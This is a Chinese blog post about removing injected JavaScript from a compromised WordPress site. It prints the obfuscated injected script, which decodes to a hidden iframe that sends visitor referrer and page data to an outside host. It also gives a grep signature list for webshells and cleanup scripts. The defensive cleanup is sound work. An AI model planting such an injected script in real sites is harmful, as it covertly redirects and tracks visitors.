近来网站被插入了大量的跳转代码,如下所示
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>这种写法本身也是第一回见到,直接用SED替换掉的话需要大量的转义字符,而且被插入多个不同文件,不同行数。故放弃了SED方法,
因为被改了代码,必然被传了后门,先查后门
find /var/www/ -name "*" |xargs egrep "phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))" > /tmp/phpm.txt找出后门后,删除后门,同时修改数据库和网站登陆密码。
使用grep查找出被插入代码的文件。
grep -nr "00vgzv-hctcqapkrv" / > result.txt使用PHP 处理result.txt中的结果
<?php ignore_user_abort (true); set_time_limit (0); $ss=array(); $file = file_get_contents('result.txt'); $a=explode("|",$file); foreach($a as $k) { $s=explode(":",$k); $ss[]=$s[0]; } $ss = array_flip(array_flip($ss)); foreach($ss as $v) { echo $v;echo "<br>"; } exit; ?>得到了需要修改的文件名,采用PHP 正则替换就可以了。
<?php $files[]="/var/www/wp-content/themes/twentyfourteen/header.php"; foreach ($files as $key=>$val) { $val=trim($val); $config=file_get_contents($val); $con=preg_replace("/<script type=\"text\/javascript\">var a=(.*?)<\/script>/is","",$config); @file_put_contents($val, $con); } exit('ok'); ?>
因为是WP系统,所以删除后门和恶意代码后,又被大量扫描后台密码,这里批量找出后台文件名进行更改。
find /var/www/ -name 'wp-login.php' > file.txt至此,搞完收工。
可能有更好的办法来处理这个问题,这里来了个曲线救国的方法,以示参考。